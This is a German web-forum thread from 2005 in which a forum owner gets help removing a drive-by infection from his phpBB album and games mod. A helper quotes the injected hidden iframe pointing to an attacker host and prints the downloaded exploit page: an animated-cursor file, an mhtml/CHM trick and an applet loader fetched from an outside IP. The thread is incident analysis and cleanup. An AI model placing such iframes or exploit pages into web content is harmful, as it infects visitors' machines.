Seite 1 von 2
[HELP] Virus oder Wurm in Album??
Verfasst: 14.04.2005 08:35
von Helmut71
Hallo..ich hab ein echt GROSSES Problem!!
In meinem Album/Board (??) hat sich irgendein Wurm oder Virus eingeschlichen!
Genauer kann ichs auch nicht definieren, da ich damit wenig Erfahrung habe - jedenfalls schlägt mein Norton beim Aufruf des Albums sofort Alarm:
http://www.hohenau.net/forum/album.php
Wer kann bitte helfen, es ist dringen!!
(Bitte nur mit Antivirenprogramm aufrufen)
Verfasst: 14.04.2005 08:56
von larsneo
in der tat - du hast ein problem...
beim aufruf der seite versucht mein ff eine 'newxpl.php' nachzuladen:
Code: Alles auswählen
From: <x>
Subject: x
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMC[....]
ich denke einmal, dass das auf die 'klassischen' ie-sicherheitslücken abzielt.
der übeltäter dafür sitzt in der kategoriebeschreibung zu 'Events in Hohenau'
Code: Alles auswählen
<iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe>
darin liegt dann der eigentliche payload
Code: Alles auswählen
1: <html><head>
2: </head><body>
3: <style>
4: * {CURSOR: url("http://213.159.117.203/dl/adv514/sploit.anr")}
5: </style>
6: <script>
7: try{
8: document.write('<object data="&#'+109+';s-its:mhtml'+':'+'file://C:\\nosuch.mht!http://213.159.117.203/dl/adv514/x.chm::/x.htm" type="text/x-scriptlet"></object>');
9: document.write('<applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv514.jar co'+'de=Counter></AP'+'PLET>');
10: }catch(e){}
11: </script>
12: <IFRAME SRC="http://213.159.117.203/dl/newexpl.php?adv=adv514" WIDTH=1 BORDER=0 HEIGHT=1></IFRAME>
13: </body></html>
insgesamt ein wirklich interessantes exploit - passender lesestoff findet sich unter
http://www.mnin.org/forums/viewtopic.php?t=112 - die passende sicherheitslücke dazu ist
http://www.microsoft.com/technet/securi ... 5-002.mspx
Verfasst: 14.04.2005 09:20
von Helmut71
danke erstmal...
Ich bin jetzt leider nicht an meinem PC - in welcher Datei steckt das genau drinnen bzw. wie kann man es entfernen???
Müsste es meinem Provider weiterleiten.
Verfasst: 14.04.2005 09:21
von larsneo
Helmut71 hat geschrieben:in welcher Datei steckt das genau drinnen bzw. wie kann man es entfernen???
larsneo hat geschrieben:der übeltäter dafür sitzt in der kategoriebeschreibung zu 'Events in Hohenau'
kontrolliere erst einmal die entsprechende beschreibung via ACP
Verfasst: 14.04.2005 09:27
von Helmut71
ok habs kapiert..da war tatsächlich dieser iframe-Befehl eingetragen. Habs gelöscht.
Wie in gottesnamen kann das passsieren??
Gibts da ein Sicherheitsloch??
Verfasst: 14.04.2005 09:28
von Helmut71
gleich noch ne Bitte: kann jemnd die Games probieren?? Angeblich kam es da auch mal zu einer Virus-Attacke:
http://www.hohenau.net/forum/activity.php
Verfasst: 14.04.2005 09:29
von larsneo
Wie in gottesnamen kann das passsieren??
das würde mich auch interessieren - kannst du die logfiles auswerten?
Verfasst: 14.04.2005 09:30
von larsneo
kann jemnd die Games probieren??
Code: Alles auswählen
<a href="profile.php?mode=register" class="mainmenu"><img src="templates/subSilver/images/icon_mini_register.gif" width="12" height="13" border="0" alt="Registrieren" hspace="3" />Registrieren - More games available to Registered Members - No Fee - No Catch.<br /><iframe src="http://iframedollars.biz/dl/adv514.php" width=0 height=0></iframe></a><br />
Verfasst: 14.04.2005 09:34
von Helmut71
und wo ists da eingetragen???????
Verfasst: 14.04.2005 09:36
von larsneo
keine ahnung - den mod habe ich mir noch nie näher angeschaut...
vielleicht im entsprechenden template oder in der übersetzung.